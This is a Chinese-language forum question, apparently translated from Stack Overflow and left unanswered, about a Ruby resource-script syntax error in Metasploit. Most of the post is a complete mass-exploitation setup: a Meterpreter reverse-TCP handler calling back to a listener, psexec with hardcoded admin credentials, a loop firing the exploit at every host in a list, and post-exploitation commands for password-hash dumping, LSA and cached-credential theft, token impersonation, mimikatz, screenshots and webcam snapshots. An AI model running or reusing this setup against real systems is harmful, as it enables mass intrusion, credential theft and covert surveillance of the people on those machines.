1

我正在尝试在https://www.pentestpartners.com/security-blog/scripting-metasploit-to-exploit-a-group-of-hosts-a-how-to/上复制脚本

在我的 con_cmd_file 我有

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp 
set autorunscript multi_console_command -rc /root/Desktop/Scripting/met_cmd_file
set lhost 192.168.1.10 
set lport 4444 
set ExitOnSession false 
exploit -j
use exploit/windows/smb/psexec
set target 1
set smbuser admin
set smbpass admin
set smbdomain Admin
set disablepayloadhandler true

在我的 met_cmd_file 我有

run post/windows/manage/priv_migrate
hashdump
run post/windows/gather/lsa_secrets
run post/windows/gather/cachedump
load incognito
list_tokens -u
screenshot
webcam_list
webcan_snap -v false
load mimikatz
kerberos
background

在我的 iter_rc 文件中,我有

<ruby>

hostsfile="/root/Desktop/Scripting/hosts_file"
hosts=[]
File.open(hostsfile,"r") do |f|
f.each_line do |line|
hosts.push line.strip
end
end
# prepare the handler and console
self.run_single("resource /root/Desktop/Scripting/con_cmd_file")
# iterate through each host and run the exploit
hosts.each do |rhost|
self.run_single("set rhost #{rhost}")
self.run_single("exploit -j -z") end

</ruby>

但是,当我运行它时,我得到了错误

resource (iter_rc.rc)> Ruby Error: SyntaxError /usr/share/metasploit-framework/lib/rex/ui/text/resource.rb:52: unknown regexp options - Dktp ["/usr/share/metasploit-framework/lib/rex/ui/text/resource.rb:61:in `eval'", "/usr/share/metasploit-framework/lib/rex/ui/text/resource.rb:61:in `load_resource'", "/usr/share/metasploit-framework/lib/msf/ui/console/driver.rb:183:in `block in initialize'", "/usr/share/metasploit-framework/lib/msf/ui/console/driver.rb:182:in `each'", "/usr/share/metasploit-framework/lib/msf/ui/console/driver.rb:182:in `initialize'", "/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `new'", "/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `driver'", "/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'", "/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'", "/usr/bin/msfconsole:49:in `<main>'"]

我已经尝试过对文件进行扩展和不扩展。我尝试过使用和不使用“”以及使用和不使用 <>,但无法使其正常工作

有人可以告诉我我做错了什么以及编写和运行此脚本的正确方法吗?

谢谢

4

0 回答 0